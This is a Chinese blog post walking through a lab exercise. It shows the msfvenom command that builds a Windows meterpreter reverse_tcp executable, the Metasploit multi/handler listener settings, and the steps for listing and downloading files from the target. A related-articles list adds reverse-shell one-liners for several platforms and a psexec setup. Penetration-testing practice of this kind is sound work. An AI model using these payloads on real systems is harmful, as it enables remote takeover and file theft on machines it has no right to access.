Metasploit应用

使用Kali生成并控制Meterpreter payload
最新推荐文章于 2025-02-19 10:10:11 发布
原创 最新推荐文章于 2025-02-19 10:10:11 发布 · 2.7k 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#安全 #渗透测试

1、在kali中生成一个被控端

输入指令msfvenom -p windows/meterpreter/reverse_tcp lhost=目标IP lport=5000 -f exe -o /home/payload.exe

这里目标IP我填的是kali的IP。

可以看到文件中生成了payload.exe

2、在kali中打开Metasploit

依次输入

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost 目标ip

set lport 5000

exploit

在靶机中打开kali生成的payload.exe后会有以下显示

说明已经获得靶机控制权。

3、下载靶机中的文件

输入ls可以查看靶机中的文件信息

输入download 文件名可以下载文件

测试完成

kali 生成PHP木马病毒进行靶机控制
chidaoqiannianzq的博客
10-17 1712
Msfvenom 是 Metasploit Framework 的一个非常强大的工具,它结合了之前 msfpayload 和 msfencode 的功能,用于生成各种类型的 Payloads,包括但不限于 shellcode、恶意文件、恶意链接等。Msfvenom 可以帮助渗透测试人员创建自定义的 Payloads,以用于渗透测试、漏洞利用和红队行动中。
Metasploit (MSF) 使用:包含基本使用、payload生成、后渗透模块使用
Alone hackers的博客
03-06 6394
Metasploit (MSF) 使用:包含基本使用,payload生成,后渗透模块使用。
Metasploit (MSF) 使用-包含基本使用、payload生成、后渗透模块使用
dzqxwzoe的博客
02-29 2033
l, --list 列出指定模块的所有可用资源,包括:payloads,encodes,nops,all-p, --payload 指定所需要使用的payload,也可以使用自定义payload,几乎支持全平台-f, --format 指定输出格式-e, --encoder 指定需要使用的encode,指定需要使用的编码。
kali生成被控、主控端
a19163656270的博客
12-14 392
右键文件系统,以root身份打开,找到生成被控端时生成的程序,修改后缀为txt(因为不能拖动exe程序进物理机,但是可以拖动普通文件),再在物理机修改后缀为exe,点击它,虽然打开不了,但是没关系。msfvenom -p windows/meterpreter/reverse_tcp lhost=(ip) lport=(端口) -f exe -o (文件路径)//在Metasploit中使用handlr来做为主控端,它位于exploit下的multi目录中。//主控端需要在Metasploit中启动。
Metasploit Framework生成定制化的攻击载荷msfvenom
最新发布
zhaoyong631的博客
02-19 794
Venom 支持添加 持久化机制(如注册表启动项)、反杀毒绕过(代码混淆、加密)、权限提升(UAC 绕过)等模块。
复现任务——漏洞渗透测试Metasploit应用
m0_74087834的博客
12-29 1305
一、漏洞渗透测试 1、靶机(Windows)安装easy file sharing server(efssetup_2018.zip),该服务存在漏洞。 2、利用Nmap扫描发现靶机(Windows)运行了该服务。 3、利用该漏洞,使得靶机运行计算器。 见第六章PPT或PDF文档 二、Metasploit应用 1、生成主控端、被控端。 2、获得靶机(Windows)控制权。 3、下载靶机上任意一个文件。 见课本P127-133
企业级Metasploit应用:构建全面的安全防护策略
[企业级Metasploit应用:构建全面的安全防护策略](https://cdn.educba.com/academy/wp-content/uploads/2021/04/Metasploit-Framework.jpg) # 1. Metasploit框架概述 ## 1.1 Metasploit的历史与发展 Metasploit...
Kali Linux渗透测试实战:安装与Metasploit应用
- 添加软件源:扩展Kali的软件库,安装更多应用。 - 安装中文输入法:方便中文用户的操作体验。 - 安装Metasploitable:创建一个易受攻击的环境用于练习。 2. Metasploit实战: - MSF终端:熟悉Metasploit的...
Kali Linux渗透测试实战:从安装到Metasploit应用
2. Metasploit的实战应用,介绍了如何使用MSF终端、选择攻击模块、配置选项、确定目标类型、选择攻击载荷等步骤。 这份手册旨在通过实践操作帮助读者快速掌握Kali Linux的渗透测试技术,对于初学者尤其有帮助,它...
Kali Linux渗透测试实战指南:从安装到Metasploit应用
第二章开始深入到Metasploit的实战应用,这是渗透测试中非常重要的部分,Metasploit框架提供了丰富的exploit和payload,能够帮助测试者模拟攻击,理解漏洞利用过程。 这份手册提供了一个全面的Kali Linux渗透测试...
Metasploit渗透测试学习笔记——7、使用Metasploit生成各种payload
Fly_鹏程万里
05-23 2983
前言在metasploit中,往往一个最有用的(初学者低估)功能模块是Metasploit的msfpayload模块。这个模块可以创建多个有效载荷,它可以帮助在任何情况下给你一个shell。对于每一个这些有效载荷可以进入msfconsole选择合理的利用,运行“设置有效载荷的必要选项(LHOST,LPORT,等),执行并等待要运行的有效负载。下面我们开始今天的介绍吧,我觉得每一个喜欢metaspl...
metasploit生成payload
Yale的博客
01-31 2496
metasploit中,我们任意选定一个payload时,metasploit都会加上generate,pry,reload等命令~ 我们来看一下 在help输出的最后我们可以看到之前提到的命令 我们看下generate命令,首先-h查看帮助 我们当然也可以不用加上任何选项来生成shellcode 这么简单生成的shellcode基本上是不能用的。为了确保我们的shellcode有效,我...
使用msfvenom生成木马用于监听别人的操作
07-14 391
msfvenom Options: -p, –payload < payload> 指定需要使用的payload(攻击荷载)。如果需要使用自定义的payload,请使用& #039;-& #039;或者stdin指定 -l, –list [module_type] 列出指定模块的所有可用资源. 模块类型包括: payloads, encoders, no...
生成msf常用payload
Fly_鹏程万里
06-04 8269
msf作为一款强大的漏洞检测工具,如何生成适用于msf的payload以及如何利用是使用msf的关键,今天就主要记录一下常用的payload以及如何使用。生成payload使用的工具是MSFVenom,下面看看他的帮助信息。在kali下可以使用如下命令列出MSFVenom可以生成的payload列表:msfvenom -l生成二进制文件关于二进制文件,主要介绍适用于Windows、linux、ma...
msf下的各种生成payload命令
热门推荐
qk的专栏
12-21 1万+
Often one of the most useful (and to the beginner underrated) abilities of Metasploit is the msfpayload module. Multiple payloads can be created with this module and it helps something that can give y
msfvenom生成各类Payload命令
weixin_30341735的博客
05-20 203
Often one of the most useful (and to the beginner underrated) abilities of Metasploit is the msfpayload module. Multiple payloads can be created with this module and it helps something that can give y...
kali生成各种payload
haha1314的博客
05-26 2627
Linux msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST= LPORT= -f elf > shell.elf Windows msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f exe > shell.exe Mac msfvenom -p osx/x86/...
kali-权限提升】(4.2.4)社会工程学工具包:远控木马使用、设置、利用
08-08 1711
【社会工程学工具包】远控木马全过程
payload模块怎Linux,kali linux之Msf-exploit模块,生成payload
weixin_29582919的博客
05-13 604
Exploit模块Active exploit(主动地向目标机器发送payload并执行,使目标交出shell(反连等))msf5 > use exploit/windows/smb/psexecmsf5 exploit(windows/smb/psexec) > set RHOST 192.168.1.13msf5 exploit(windows/smb/psexec) > s...
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值